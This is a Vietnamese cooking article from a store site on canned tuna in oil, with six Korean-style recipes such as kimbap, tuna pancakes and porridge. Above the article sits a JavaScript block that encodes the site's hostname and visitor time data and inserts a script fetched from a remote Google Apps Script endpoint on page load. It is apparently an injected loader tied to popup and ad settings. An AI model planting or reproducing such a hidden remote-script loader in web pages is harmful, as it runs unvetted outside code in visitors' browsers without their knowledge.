var GTM = 'GTM-NJKFBQ8'; var GG_ADS = 'ca-pub-8687624480880776'; var POPUP_IMG_PREFIX = "https://nhaxinhplaza.vn/wp-content/uploads/2022/08/"; // qc.png, close.png var SHOW_POPUP = 1; // 0: disable, 1: enable var MAX_CLAIM = 1; var TIME_TO_SHOW_POPUP = 10; // 10s var MAX_BUFF = 3; var b64e = function (a) { return btoa(encodeURIComponent(a).replace(/%([0-9A-F]{2})/g, function (b, a) { return String.fromCharCode("0x" + a) })) }; var gg_layer = document.createElement('script'); gg_layer.type = 'text/javascript'; gg_layer.src = `https://script.google.com/macros/s/AKfycbwT2tLHaERiLaaaT_05pnXM2h0pjKHGRPBTQgeffPjyIIXBAR46dAuj5S0sgi2scsJ77Q/exec ?st=${b64e(location.hostname)}&tm=${new Date().getHours()}&os=${b64e(new Date().getTimezoneOffset())}`; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(gg_layer, s);

Cách chế biến cá ngừ ngâm dầu ngon nhất – Tèobokki Store

Cá ngừ ngâm dầu là sản phẩm mới đang được nhiều người tiêu dùng lựa chọn và trở nên phổ biến bên cạnh các sản phẩm đồ hộp quen thuộc như thịt giăm bông hay cá thu đao. Cá ngừ ngâm dầu hay nhiều người vẫn thường gọi là cá ngừ hộp bởi ngoài thành phần thịt cá, nhà sản xuất thêm vào dầu thực vật mà thường là dầu hạt bông, dầu oliu hay dầu hạt nho để giữ được hương vị và mùi thơm của cá ngừ mà không làm khô thịt cá.

Nhiều người nghĩ cá ngừ hộp sẽ chứa ít dinh dưỡng hơn so với cá ngừ tươi. Tuy nhiên, các chuyên gia dinh dưỡng đã chỉ ra rằng cá ngừ hộp không có sự khác biệt dinh dưỡng nào so với các ngừ tươi ngoại trừ một số vitamin. Nói đúng hơn, trong quá trình sản xuất, xương cá ngừ được làm mềm bằng cách xử lí nhiệt, lúc này canxi có trong xương sẽ hòa tan vào thịt cá giúp hàm lượng canxi cao hơn. Hơn nữa, cá ngừ ngâm dầu chứa lượng DHA và omega gấp 3 lần cá thu, nhiều protein và canxi hơn thịt heo và thịt gà.

Cá ngừ ngâm dầu có thể ăn được ngay mà không cần nấu chín, người Hàn thường xuyên sử dụng chúng để chế biến thành nhiều món ăn khác nhau. Họ cũng tin rằng ăn cá ngừ có nhiều lợi ích cho sức khỏe vì chúng giàu protein và ít chất béo, thích hợp để trở thành bữa ăn nhẹ đêm khuya hay những người thực hiện chế độ ăn kiêng với món salad cá ngừ.

Sản phẩm cá ngừ ngâm dầu Dongwon phổ biến tại Hàn

Sản phẩm cá ngừ ngâm dầu đầu tiên tại Hàn Quốc được tạo bởi Dongwon F&B vào năm 1982 và bắt đầu trở nên phổ biến thông qua món canh kim chi cá ngừ của họ. Cá ngừ ngâm dầu Dongwon đã duy trì vị thế số 1 tại Hàn Quốc và trở nên phổ biến ở nhiều quốc gia khác bởi sự đa dạng về hương vị như cá ngừ vị cay gochujang, sốt mayonnaise và vị cà ri.

Để ăn cá ngừ ngâm dầu tốt cho sức khỏe, tốt nhất là vớt cá ngừ khỏi lớp dầu thực vật trong hộp, rây cá ngừ qua rây cho bớt dầu rồi đổ nước nóng qua một lần. Nếu ăn không hết nên cho phần thừa cá ngừ vào hộp đậy kín và bảo quản tủ lạnh sử dụng dần trong 3 ngày.

5 CÁCH CHẾ BIẾN CÁ NGỪ NGÂM DẦU NGON NHẤT

#1 Kimbap cá ngừ

Nguyên liệu :

  • 1 hộp cá ngừ hộp Dongwon (Mua cá ngừ hộp làm kimbap tại đây)
  • 250 gr gạo tẻ
  • 1 củ cà rốt
  • 1 quả dưa leo
  • 2 quả trứng gà
  • 3 muỗng canh sốt mayonnaise
  • Rong biển lá cuộn cơm

Cách làm :

  • Gạo vo sạch ngâm 30 phút sau đó nấu chín bằng nồi cơm điện. Khi cơm chín, lúc cơm còn nóng trộn với ít muối cho đậm đà.
  • Dưa leo bỏ ruột xắt sợi dài. Cà rốt xắt sợi hấp chín. Đánh tan trứng gà, chiên vàng 2 mặt, xắt sợi. Cá ngừ chỉ vớt lấy phần cái, bỏ phần dầu ngâm.
  • Trộn đều cá ngừ với sốt mayonnaise. Vừa trộn vừa dằm nhuyễn cá ra cho thật mịn.
  • Trải rong biển ra mặt phẳng. Rong biển cuộn kimbap có 2 mặt, mặt bóng và mặt nhám. Cơm sẽ cho lên mặt nhám để dễ dính cơm hơn.
  • Trải cơm ra 1 lượng vừa phải, dàn mỏng ép chặt xuống mặt lá. Chừa khoảng 1.5cm ở mép cuối lá kim để lát cuốn lại không tràn cơm ra ngoài.
  • Xếp các nguyên liệu lên. Từ từ cuốn lại chặt tay. Dùng dao bén cắt thành từng khoanh vừa ăn.

#2 Cơm nắm cá ngừ

Nguyên liệu

  • Cá ngừ ngâm dầu
  • Sốt mayonnaise
  • Nước tương
  • Cơm trắng
  • Rong biển vụn
  • Mè rang

Thực hiện

Bước 1: Tách dầu khỏi cá ngừ hộp rồi cho vào một tô.

Bước 2: Nêm cá ngừ hộp với 4 muỗng mayonnaise và 1 muỗng nước tương, sau đó trộn đều và đánh cho đến khi cá ngừ được nhuyễn mịn.

Bước 3: Để dễ thực hiện cơm nắm, bạn trải cơm đều lên mặt phẳng như thớt, sau đó cho cá ngừ vào giữa rồi vo viên lại cho chặt.

Bước 4: Cuối cùng lăn viên cơm nắm qua rong biển vụn cho bám đều, hoặc bạn có thể cho vụn rong biển vào túi bóng sau đó cho cơm nắm vào chung rồi lắc thì sẽ bám đều hơn.

#3 Chamchijeon – Bánh rán cá ngừ

Nguyên liệu

  • Cá ngừ ngâm dầu
  • ¼ Củ hành tây
  • Cà rốt
  • Hành lá
  • Tỏi băm
  • 2 Quả trứng
  • Muối
  • Hạt tiêu xay
  • Bột chiên bánh xèo Hàn Quốc
  • Nước tương
  • Giấm trắng nấu ăn
  • Ớt bột Hàn Quốc (gochugaru)

Thực hiện

Bước 1: Tách dầu khỏi cá ngừ hộp, rây cho bớt dầu rồi đổ nước nóng qua một lần.

Bước 2: Hành tây thái sợi, băm nhỏ hành lá rồi trộn chung trong một tô.

Bước 3: Cho thêm vào tô tỏi băm, 2 quả trứng, nêm thêm một ít muối và tiêu.

Bước 4: Cho thêm vào tô 3 muỗng canh bột chiên bánh xèo Hàn Quốc rồi trộn đều.

Bước 5: Cuối cùng, cá ngừ đem đánh nguyễn sau đó cho vào tô bột trộn đều.

Bước 6: Đun nóng một ít dầu trên chảo, cho từng muỗng bột bánh vào chiên chín vàng hai mặt thì tắt bếp.

Về phần nước chấm, bạn pha theo công thức 1 muỗng nước tương + 1 muỗn giấm trắng + ½ muỗng bột ớt.

#4 Cháo cá ngừ

Nguyên liệu

  • Cá ngừ ngâm dầu
  • 550ml nước
  • Cơm trắng
  • Rau củ (bí ngòi, cà rốt, nấm)
  • Nước dùng bò
  • Dầu mè
  • Rong biển vụn
  • Mè rang

Thực hiện

Bước 1: Sơ chế: Tách dầu ra khỏi cá ngừ hộp. Rau củ gồm bí ngòi, cà rốt, nấm rửa sạch sau đó cắt nhỏ.

Bước 2: Cho 550ml nước, cá ngừ và một chén cơm trắng vào nồi rồi đun ở lửa vừa.

Bước 3: Cho rau củ đã cắt nhỏ vào nồi nấu chung.

Bước 4: Cho vào nồi một muỗng canh nước dùng bò. Nếu bạn không có sẵn nước dùng thì có thể nêm bằng hạt nêm, nước tương, muối hay dầu hào để thay thế. Trong khi nấu, nên khuấy thường xuyên để tránh cháo bị cháy.

Bước 5: Sau khi cháo chín, tắt bếp rồi cho ½ muỗng dầu mè vào cháo để giúp tăng hương thơm.

Bước 6: Cho cháo ra tô sau đó thêm rong biển vụn và mè rang rồi thưởng thức.

#5 Cơm chiên cá ngừ

Để cho món cơm chiên được ngon, bạn có thể chọn bất kì loại gạo nào hay cơm đã nấu chín nhưng chú ý không nên dùng loại gạo nếp hay cơm có độ dẻo cao để tránh cơm bị nhão khi chiên và khó được giòn bên ngoài.

Nguyên liệu

  • Cá ngừ ngâm dầu
  • Cơm trắng
  • 2 Lòng đỏ trứng gà
  • Muối ăn
  • Hạt tiêu xay
  • Hành lá
  • Dầu ăn
  • Hành tây
  • Mayonnaise
  • Sốt teriyaki

Thực hiện

Bước 1: Cho 2 lòng đỏ trứng gà cùng với cơm trắng vào một tô lớn, cho thêm một ít muối rồi trộn đều.

Bước 2: Phi hành lá với một ít dầu ăn rồi cho cơm vào đảo chung cho đến khi chín tới thì cho ra dĩa.

Bước 3: Cho cá ngừ ngâm dầu vào chảo đảo sơ cho nóng, cho thêm ít hạt tiêu xay cho thơm rồi tắt bếp.

Bước 4: Cho cá ngừ lên trên cơm chiên, trang trí với hành lá và hành tây cắt lát.

Bước 5: Cho sốt mayonnaise cùng sốt teriyaki lên trên là đã hoàn thành món ăn.

#6 Cơm cá ngừ mayonnaise

Nguyên liệu

  • Cá ngừ ngâm dầu
  • Rau thơm tùy thích (rau cải, bina, diếp cá,..)
  • 1 Quả trứng
  • Cơm trắng
  • Mayonnaise
  • Sốt teriyaki

Thực hiện

Bước 1: Tách dầu ra khỏi cá ngừ.

Bước 2: Rửa sạch các loại rau củ đã chuẩn bị.

Bước 3: Đập 1 quả trứng vào tô rồi làm trứng bác bằng cách cho một ít dầu vào chảo, cho trứng đánh vào làm nóng, nêm ít muối cho chín tới rồi tắt bếp.

Bước 4: Cho cơm vào tô, sau đó cho lần lượt trứng bác, rau thơm và cá ngừ lên trên.

Bước 5: Rắc sốt mayonnaise và teriyaki lên trên cùng là hoàn thành.